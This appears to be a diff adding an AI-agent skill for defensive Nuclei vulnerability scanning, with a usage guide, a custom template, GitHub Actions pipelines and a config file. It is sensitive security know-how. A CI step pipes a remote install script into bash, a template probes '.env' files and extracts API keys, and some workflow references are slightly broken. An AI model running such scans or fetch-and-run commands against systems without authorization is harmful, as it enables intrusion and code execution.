4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,510 @@
---
name: dast-nuclei
description: >
Fast, template-based vulnerability scanning using ProjectDiscovery's Nuclei with extensive community
templates covering CVEs, OWASP Top 10, misconfigurations, and security issues across web applications,
APIs, and infrastructure. Use when: (1) Performing rapid vulnerability scanning with automated CVE
detection, (2) Testing for known vulnerabilities and security misconfigurations in web apps and APIs,
(3) Running template-based security checks in CI/CD pipelines with customizable severity thresholds,
(4) Creating custom security templates for organization-specific vulnerability patterns, (5) Scanning
multiple targets efficiently with concurrent execution and rate limiting controls.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, nuclei, vulnerability-scanning, cve, owasp, api-testing, automation, templates]
frameworks: [OWASP, CWE, CVE]
dependencies:
tools: [nuclei]
optional: [docker, git]
references:
- https://docs.projectdiscovery.io/tools/nuclei/overview
- https://github.com/projectdiscovery/nuclei
- https://github.com/projectdiscovery/nuclei-templates
---
# DAST with Nuclei
## Overview
Nuclei is a fast, template-based vulnerability scanner from ProjectDiscovery that uses YAML templates to detect
security vulnerabilities, misconfigurations, and exposures across web applications, APIs, networks, and cloud
infrastructure. With 7,000+ community templates covering CVEs, OWASP vulnerabilities, and custom checks, Nuclei
provides efficient automated security testing with minimal false positives.
## Quick Start
### Installation
```bash
# Install via Go
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Or using Docker
docker pull projectdiscovery/nuclei:latest
# Update templates (automatically downloads 7000+ community templates)
nuclei -update-templates
```
### Basic Vulnerability Scan
```bash
# Scan single target with all templates
nuclei -u https://target-app.com
# Scan with specific severity levels
nuclei -u https://target-app.com -severity critical,high
# Scan multiple targets from file
nuclei -list targets.txt -severity critical,high,medium -o results.txt
```
### Quick CVE Scan
```bash
# Scan for specific CVEs
nuclei -u https://target-app.com -tags cve -severity critical,high
# Scan for recent CVEs
nuclei -u https://target-app.com -tags cve -severity critical -template-condition "contains(id, 'CVE-')"
```
## Core Workflow
### Workflow Checklist
Progress:
[ ] 1. Install Nuclei and update templates to latest version
[ ] 2. Define target scope (URLs, domains, IP ranges)
[ ] 3. Select appropriate templates based on target type and risk tolerance
[ ] 4. Configure scan parameters (rate limiting, severity, concurrency)
[ ] 5. Execute scan with proper authentication if needed
[ ] 6. Review findings, filter false positives, and verify vulnerabilities
[ ] 7. Map findings to OWASP/CWE frameworks
[ ] 8. Generate security report with remediation guidance
Work through each step systematically. Check off completed items.
### Step 1: Template Selection and Target Scoping
Identify target applications and select relevant template categories:
```bash
# List available template categories
nuclei -tl
# List templates by tag
nuclei -tl -tags owasp
nuclei -tl -tags cve,misconfig
# Show template statistics
nuclei -tl -tags cve -severity critical | wc -l
```
**Template Categories:**
- **cve**: Known CVE vulnerabilities (thousands of CVE-specific templates)
- **owasp**: OWASP Top 10 vulnerabilities
- **misconfig**: Common security misconfigurations
- **exposed-panels**: Admin panels and login pages
- **takeovers**: Subdomain takeover vulnerabilities
- **default-logins**: Default credentials
- **exposures**: Sensitive file and data exposures
- **tech**: Technology detection and fingerprinting
**Target Scoping Best Practices:**
- Create target list excluding third-party services
- Group targets by application type for focused scanning
- Define exclusions for sensitive endpoints (payment, logout, delete actions)
### Step 2: Configure Scan Parameters
Set appropriate rate limiting and concurrency for target environment:
```bash
# Conservative scan (avoid overwhelming target)
nuclei -u https://target-app.com \
-severity critical,high \
-rate-limit 50 \
-concurrency 10 \
-timeout 10
# Aggressive scan (faster, higher load)
nuclei -u https://target-app.com \
-severity critical,high,medium \
-rate-limit 150 \
-concurrency 25 \
-bulk-size 25
```
**Parameter Guidelines:**
- **rate-limit**: Requests per second (50-150 typical, lower for production)
- **concurrency**: Parallel template execution (10-25 typical)
- **bulk-size**: Parallel host scanning (10-25 for multiple targets)
- **timeout**: Per-request timeout in seconds (10-30 typical)
For CI/CD integration patterns, see `scripts/nuclei_ci.sh`.
### Step 3: Execute Targeted Scans
Run scans based on security objectives:
**Critical Vulnerability Scan:**
```bash
# Focus on critical and high severity issues
nuclei -u https://target-app.com \
-severity critical,high \
-tags cve,owasp \
-o critical-findings.txt \
-json -jsonl-export critical-findings.jsonl
```
**Technology-Specific Scan:**
```bash
# Scan specific technology stack
nuclei -u https://target-app.com -tags apache,nginx,wordpress,drupal
# Scan for exposed sensitive files
nuclei -u https://target-app.com -tags exposure,config
# Scan for authentication issues
nuclei -u https://target-app.com -tags auth,login,default-logins
```
**API Security Scan:**
```bash
# API-focused security testing
nuclei -u https://api.target.com \
-tags api,graphql,swagger \
-severity critical,high,medium \
-header "Authorization: Bearer $API_TOKEN"
```
**Custom Template Scan:**
```bash
# Scan with organization-specific templates
nuclei -u https://target-app.com \
-t custom-templates/ \
-t nuclei-templates/http/cves/ \
-severity critical,high
```
### Step 4: Authenticated Scanning
Perform authenticated scans for complete coverage:
```bash
# Scan with authentication headers
nuclei -u https://target-app.com \
-header "Authorization: Bearer $AUTH_TOKEN" \
-header "Cookie: session=$SESSION_COOKIE" \
-tags cve,owasp
# Scan with custom authentication using bundled script
python3 scripts/nuclei_auth_scan.py \
--target https://target-app.com \
--auth-type bearer \
--token-env AUTH_TOKEN \
--severity critical,high \
--output auth-scan-results.jsonl
```
For OAuth, SAML, and MFA scenarios, see `references/authentication_patterns.md`.
### Step 5: Results Analysis and Validation
Review findings and eliminate false positives:
```bash
# Parse JSON output for high-level summary
python3 scripts/parse_nuclei_results.py \
--input critical-findings.jsonl \
--output report.html \
--group-by severity
# Filter and verify findings
nuclei -u https://target-app.com \
-tags cve \
-severity critical \
-verify \
-verbose
```
**Validation Workflow:**
1. Review critical findings first (immediate action required); see the triage sketch after this list
2. Verify each finding manually (curl, browser inspection, PoC testing)
3. Check for false positives using `references/false_positive_guide.md`
4. Map confirmed vulnerabilities to OWASP Top 10 using `references/owasp_mapping.md`
5. Cross-reference with CWE classifications for remediation patterns
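To support step 1, findings can be grouped by severity straight from the JSONL export. A minimal triage sketch, assuming the standard nuclei JSONL fields (`template-id`, `info.severity`, `matched-at`):
```python
# Group nuclei JSONL findings by severity for triage
# (field names assume the standard nuclei export format; adjust if your version differs).
import json
from collections import defaultdict

findings = defaultdict(list)
with open("critical-findings.jsonl") as fh:
    for line in fh:
        if not line.strip():
            continue
        result = json.loads(line)
        severity = result.get("info", {}).get("severity", "unknown")
        findings[severity].append(
            f'{result.get("template-id")} -> {result.get("matched-at")}'
        )

for severity in ("critical", "high", "medium", "low", "info", "unknown"):
    for entry in findings.get(severity, []):
        print(f"[{severity}] {entry}")
```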
**Feedback Loop Pattern:**
```bash
# 1. Initial scan
nuclei -u https://target-app.com -severity critical,high -o scan1.txt
# 2. Apply fixes to identified vulnerabilities
# 3. Re-scan to verify remediation
nuclei -u https://target-app.com -severity critical,high -o scan2.txt
# 4. Compare results to ensure vulnerabilities are resolved
diff scan1.txt scan2.txt
```
### Step 6: Reporting and Remediation Tracking
Generate comprehensive security reports:
```bash
# Generate detailed report with OWASP/CWE mappings
python3 scripts/nuclei_report_generator.py \
--input scan-results.jsonl \
--output security-report.html \
--format html \
--include-remediation \
--map-frameworks owasp,cwe
# Export to SARIF for GitHub Security tab
nuclei -u https://target-app.com \
-severity critical,high \
-sarif-export github-sarif.json
```
See `assets/report_templates/` for customizable report formats.
## Automation & CI/CD Integration
### GitHub Actions Integration
```yaml
# .github/workflows/nuclei-scan.yml
name: Nuclei Security Scan
on: [push, pull_request]
jobs:
nuclei:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Nuclei Scan
uses: projectdiscovery/nuclei-action@main
with:
target: https://staging.target-app.com
severity: critical,high
templates: cves,owasp,misconfig
- name: Upload Results
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: nuclei.sarif
```
### Docker-Based CI/CD Scanning
```bash
# Run in CI/CD pipeline with Docker
docker run --rm \
-v $(pwd):/reports \
projectdiscovery/nuclei:latest \
-u $TARGET_URL \
-severity critical,high \
-json -jsonl-export /reports/nuclei-results.jsonl
# Check exit code and fail build on critical findings
if grep -q '"severity":"critical"' nuclei-results.jsonl; then
echo "Critical vulnerabilities detected!"
exit 1
fi
```
### Advanced Automation with Custom Scripts
```bash
# Automated multi-target scanning with parallel execution
./scripts/nuclei_bulk_scanner.sh \
--targets-file production-apps.txt \
--severity critical,high \
--slack-webhook $SLACK_WEBHOOK \
--output-dir scan-reports/
# Scheduled vulnerability monitoring
./scripts/nuclei_scheduler.sh \
--schedule daily \
--targets targets.txt \
--diff-mode \
--alert-on new-findings
```
For complete CI/CD integration examples, see `scripts/ci_integration_examples/`.
## Custom Template Development
Create organization-specific security templates:
```yaml
# custom-templates/api-key-exposure.yaml
id: custom-api-key-exposure
info:
name: Custom API Key Exposure Check
author: security-team
severity: high
description: Detects exposed API keys in custom application endpoints
tags: api,exposure,custom
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/config"
- "{{BaseURL}}/.env"
matchers-condition: and
matchers:
- type: word
words:
- "api_key"
- "secret_key"
- type: status
status:
- 200
extractors:
- type: regex
name: api_key
regex:
- 'api_key["\s:=]+([a-zA-Z0-9_-]{32,})'
```
**Template Development Resources:**
- `references/template_development.md` - Complete template authoring guide
- `assets/template_examples/` - Sample templates for common patterns
- [Nuclei Template Guide](https://docs.projectdiscovery.io/templates/introduction)
## Security Considerations
- **Authorization**: Obtain explicit written permission before scanning any systems not owned by your organization
- **Rate Limiting**: Configure appropriate rate limits to avoid overwhelming target applications or triggering DDoS protections
- **Production Safety**: Use conservative scan parameters (rate-limit 50, concurrency 10) for production environments
- **Sensitive Data**: Scan results may contain sensitive URLs, parameters, and application details - sanitize before sharing
- **False Positives**: Manually verify all critical and high severity findings before raising security incidents
- **Access Control**: Restrict access to scan results and templates containing organization-specific vulnerability patterns
- **Audit Logging**: Log all scan executions, targets, findings severity, and remediation actions for compliance
- **Legal Compliance**: Adhere to applicable computer-fraud and anti-hacking laws; unauthorized scanning can carry civil and criminal penalties
- **Credentials Management**: Never hardcode credentials in templates; use environment variables or secrets management
- **Scope Validation**: Double-check target lists to avoid scanning third-party or out-of-scope systems
## Bundled Resources
### Scripts (`scripts/`)
- `nuclei_ci.sh` - CI/CD integration wrapper with exit code handling and artifact generation
- `nuclei_auth_scan.py` - Authenticated scanning with multiple authentication methods (Bearer, API key, Cookie)
- `nuclei_bulk_scanner.sh` - Parallel scanning of multiple targets with aggregated reporting
- `nuclei_scheduler.sh` - Scheduled scanning with diff detection and alerting
- `parse_nuclei_results.py` - JSON/JSONL parser for generating HTML/CSV reports with severity grouping
- `nuclei_report_generator.py` - Comprehensive report generator with OWASP/CWE mappings and remediation guidance
- `template_validator.py` - Custom template validation and testing framework
### References (`references/`)
- `owasp_mapping.md` - OWASP Top 10 mapping for Nuclei findings
- `template_development.md` - Custom template authoring guide
- `authentication_patterns.md` - Advanced authentication patterns (OAuth, SAML, MFA)
- `false_positive_guide.md` - False positive identification and handling
### Assets (`assets/`)
- `github_actions.yml` - GitHub Actions workflow with SARIF export
- `nuclei_config.yaml` - Comprehensive configuration template
## Common Patterns
### Pattern 1: Progressive Severity Scanning
Start with critical vulnerabilities and progressively expand scope:
```bash
# Stage 1: Critical vulnerabilities only (fast)
nuclei -u https://target-app.com -severity critical -o critical.txt
# Stage 2: High severity if critical issues found
if [ -s critical.txt ]; then
nuclei -u https://target-app.com -severity high -o high.txt
fi
# Stage 3: Medium/Low for comprehensive assessment
nuclei -u https://target-app.com -severity medium,low -o all-findings.txt
```
### Pattern 2: Technology-Specific Scanning
Focus on known technology stack vulnerabilities:
```bash
# 1. Identify technologies
nuclei -u https://target-app.com -tags tech -o tech-detected.txt
# 2. Parse detected technologies
TECHS=$(grep -oP 'matched at \K\w+' tech-detected.txt | sort -u)
# 3. Scan for technology-specific vulnerabilities
for tech in $TECHS; do
nuclei -u https://target-app.com -tags $tech -severity critical,high -o vulns-$tech.txt
done
```
### Pattern 3: Multi-Stage API Security Testing
Comprehensive API security assessment:
```bash
# Stage 1: API discovery and fingerprinting
nuclei -u https://api.target.com -tags api,swagger,graphql -o api-discovery.txt
# Stage 2: Authentication testing
nuclei -u https://api.target.com -tags auth,jwt,oauth -o api-auth.txt
# Stage 3: Known API CVEs
nuclei -u https://api.target.com -tags api,cve -severity critical,high -o api-cves.txt
# Stage 4: Business logic testing with custom templates
nuclei -u https://api.target.com -t custom-templates/api/ -o api-custom.txt
```
### Pattern 4: Continuous Security Monitoring
```bash
# Daily scan with diff detection
nuclei -u https://production-app.com \
-severity critical,high -tags cve \
-json -jsonl-export scan-$(date +%Y%m%d).jsonl
# Use bundled scripts for diff analysis and alerting
```
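Diff detection can be as simple as comparing the sets of (`template-id`, `matched-at`) pairs between two exports. A minimal sketch, assuming nuclei's standard JSONL fields:
```python
# Report findings present in today's JSONL export but not in yesterday's
# (keys assume nuclei's standard JSONL fields).
import json
import sys

def keys(path):
    with open(path) as fh:
        return {
            (r.get("template-id"), r.get("matched-at"))
            for r in (json.loads(l) for l in fh if l.strip())
        }

old, new = keys(sys.argv[1]), keys(sys.argv[2])
for template_id, location in sorted(new - old, key=str):
    print(f"NEW: {template_id} at {location}")
```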
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps, Travis CI
- **Issue Tracking**: Jira, GitHub Issues, ServiceNow, Linear (via SARIF or custom scripts)
- **Security Platforms**: Defect Dojo, Splunk, ELK Stack, SIEM platforms (via JSON export)
- **Notification**: Slack, Microsoft Teams, Discord, PagerDuty, email (via webhook scripts)
- **SDLC**: Pre-deployment scanning, security regression testing, vulnerability monitoring
- **Cloud Platforms**: AWS Lambda, Google Cloud Functions, Azure Functions (serverless scanning)
- **Reporting**: HTML, JSON, JSONL, SARIF, Markdown, CSV formats
## Troubleshooting
Common issues and solutions:
- **Too Many False Positives**: Filter by severity (`-severity critical,high`), exclude tags (`-etags tech,info`). See `references/false_positive_guide.md`
- **Incomplete Coverage**: Verify templates loaded (`nuclei -tl | wc -l`), update templates (`nuclei -update-templates`)
- **Rate Limiting/WAF**: Reduce aggressiveness (`-rate-limit 20 -concurrency 5 -timeout 15`)
- **High Resource Usage**: Reduce parallelism (`-concurrency 5 -bulk-size 5`)
- **Auth Headers Not Working**: Debug with `-debug`, verify token format, see `references/authentication_patterns.md`
## References
- [Nuclei Documentation](https://docs.projectdiscovery.io/tools/nuclei/overview)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
- [OWASP Top 10](https://owasp.org/Top10/)
- [CWE Database](https://cwe.mitre.org/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
mkdir -p "${{ env.REPORT_DIR }}"
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
mkdir -p "${{ env.REPORT_DIR }}"
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
mkdir -p "${{ env.REPORT_DIR }}"
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
mkdir -p "${{ env.REPORT_DIR }}"
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
# Write the dynamic header with an unquoted heredoc so $(date ...) is expanded
cat > consolidated-report/security-summary.md << EOF
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
EOF
# Append the static body with a quoted heredoc so the backticks stay literal
cat >> consolidated-report/security-summary.md << 'EOF'
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,192 @@
# GitHub Actions Workflow for Nuclei Security Scanning
# Place this file in .github/workflows/nuclei-scan.yml
name: Nuclei Security Scan
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main ]
schedule:
# Run daily at 2 AM UTC
- cron: '0 2 * * *'
workflow_dispatch:
inputs:
target_url:
description: 'Target URL to scan'
required: true
default: 'https://staging.example.com'
severity:
description: 'Severity levels (comma-separated)'
required: false
default: 'critical,high'
env:
# Default target URL (override with workflow_dispatch input)
TARGET_URL: https://staging.example.com
# Severity levels to scan
SEVERITY: critical,high
# Template tags to use
TEMPLATE_TAGS: cve,owasp,misconfig
jobs:
nuclei-scan:
name: Nuclei Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Run Nuclei Scan
id: nuclei
uses: projectdiscovery/nuclei-action@main
with:
target: ${{ github.event.inputs.target_url || env.TARGET_URL }}
severity: ${{ github.event.inputs.severity || env.SEVERITY }}
templates: ${{ env.TEMPLATE_TAGS }}
output: nuclei-results.jsonl
- name: Parse Nuclei Results
id: parse
if: always()
run: |
# Install dependencies (if using custom parser)
# pip install -r requirements.txt
# Parse results and generate HTML report
if [ -f nuclei-results.jsonl ]; then
echo "Parsing Nuclei results..."
python3 scripts/parse_nuclei_results.py \
--input nuclei-results.jsonl \
--output nuclei-report.html \
--format html
# Count findings by severity
# grep -c already prints 0 when nothing matches; "|| true" only suppresses the non-zero exit status
CRITICAL=$(grep -c '"severity":"critical"' nuclei-results.jsonl || true)
HIGH=$(grep -c '"severity":"high"' nuclei-results.jsonl || true)
TOTAL=$(wc -l < nuclei-results.jsonl)
echo "## Nuclei Scan Results" >> $GITHUB_STEP_SUMMARY
echo "- **Total Findings**: $TOTAL" >> $GITHUB_STEP_SUMMARY
echo "- **Critical**: $CRITICAL" >> $GITHUB_STEP_SUMMARY
echo "- **High**: $HIGH" >> $GITHUB_STEP_SUMMARY
# Set outputs
echo "critical=$CRITICAL" >> $GITHUB_OUTPUT
echo "high=$HIGH" >> $GITHUB_OUTPUT
echo "total=$TOTAL" >> $GITHUB_OUTPUT
else
echo "No findings detected" >> $GITHUB_STEP_SUMMARY
echo "critical=0" >> $GITHUB_OUTPUT
echo "high=0" >> $GITHUB_OUTPUT
echo "total=0" >> $GITHUB_OUTPUT
fi
- name: Upload SARIF file
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: nuclei.sarif
category: nuclei
- name: Upload Artifacts
if: always()
uses: actions/upload-artifact@v4
with:
name: nuclei-scan-results
path: |
nuclei-results.jsonl
nuclei-report.html
nuclei.sarif
retention-days: 30
- name: Comment on PR
if: github.event_name == 'pull_request' && always()
uses: actions/github-script@v7
with:
script: |
const critical = '${{ steps.parse.outputs.critical || 0 }}';
const high = '${{ steps.parse.outputs.high || 0 }}';
const total = '${{ steps.parse.outputs.total || 0 }}';
const body = `## 🔒 Nuclei Security Scan Results
| Severity | Count |
|----------|-------|
| Critical | ${critical} |
| High | ${high} |
| **Total** | **${total}** |
${critical > 0 ? '⚠️ **Critical vulnerabilities detected!**' : ''}
${high > 0 ? '⚠️ High severity vulnerabilities detected.' : ''}
View detailed results in the [workflow artifacts](https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}).`;
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: body
});
- name: Fail on Critical Findings
if: steps.parse.outputs.critical > 0
run: |
echo "::error::Critical vulnerabilities detected!"
exit 1
- name: Notify on Slack
if: failure() && steps.parse.outputs.critical > 0
uses: slackapi/slack-github-action@v1
with:
payload: |
{
"text": "🚨 Critical vulnerabilities detected in ${{ github.repository }}",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "*Critical Security Vulnerabilities Detected*\n\n*Repository:* ${{ github.repository }}\n*Branch:* ${{ github.ref_name }}\n*Critical Findings:* ${{ steps.nuclei.outputs.critical }}\n*High Findings:* ${{ steps.nuclei.outputs.high }}\n\n<https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}|View Scan Results>"
}
}
]
}
env:
SLACK_WEBHOOK_URL: ${{ secrets.SLACK_WEBHOOK_URL }}
# Optional: Separate job for authenticated scanning
nuclei-authenticated-scan:
name: Nuclei Authenticated Scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main' # Only run on main branch
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Run Authenticated Scan
uses: projectdiscovery/nuclei-action@main
with:
target: ${{ env.TARGET_URL }}
severity: critical,high
templates: cve,owasp
# Add authentication headers from secrets
headers: |
Authorization: Bearer ${{ secrets.API_TOKEN }}
Cookie: session=${{ secrets.SESSION_COOKIE }}
output: nuclei-auth-results.jsonl
- name: Upload Authenticated Results
if: always()
uses: actions/upload-artifact@v4
with:
name: nuclei-authenticated-scan-results
path: nuclei-auth-results.jsonl
retention-days: 30

View File

@@ -0,0 +1,225 @@
# Nuclei Configuration File
# Save as ~/.config/nuclei/config.yaml or specify with -config flag
# Template configuration
templates:
# Auto-update templates on each run
update-templates: true
# Template directory (default: ~/.nuclei-templates/)
# templates-directory: /custom/path/to/templates
# Custom template paths
# custom-templates:
# - /path/to/custom/templates/
# - /path/to/organization/templates/
# Scan configuration
severity:
- critical
- high
# - medium
# - low
# - info
# Rate limiting (requests per second)
rate-limit: 50
# Concurrency (parallel template execution)
concurrency: 10
# Bulk size (parallel host scanning)
bulk-size: 10
# Timeout per request (seconds)
timeout: 10
# Retries for failed requests
retries: 1
# HTTP configuration
http:
# User agent
user-agent: "Mozilla/5.0 (compatible; Nuclei/3.0)"
# Follow redirects
follow-redirects: true
# Max redirects to follow
max-redirects: 3
# Custom headers (applied to all requests)
# headers:
# - "X-Custom-Header: value"
# - "Authorization: Bearer token"
# Proxy configuration
# proxy: http://proxy.example.com:8080
# proxy-socks: socks5://proxy.example.com:1080
# Network configuration
network:
# Disable SSL/TLS verification (use with caution)
# disable-ssl-verification: false
# Enable HTTP/2
# disable-http2: false
# Output configuration
output:
# Silent mode (only show findings)
silent: false
# Verbose mode (detailed output)
verbose: false
# No color output
no-color: false
# JSON output
json: false
# JSONL output (one JSON per line)
jsonl: true
# SARIF output
# sarif: true
# Markdown output
# markdown: false
# Filtering configuration
filters:
# Exclude templates by ID
# exclude-ids:
# - template-id-1
# - template-id-2
# Exclude templates by tag
# exclude-tags:
# - tech
# - info
# Exclude severity levels
# exclude-severity:
# - info
# Include only specific tags
# tags:
# - cve
# - owasp
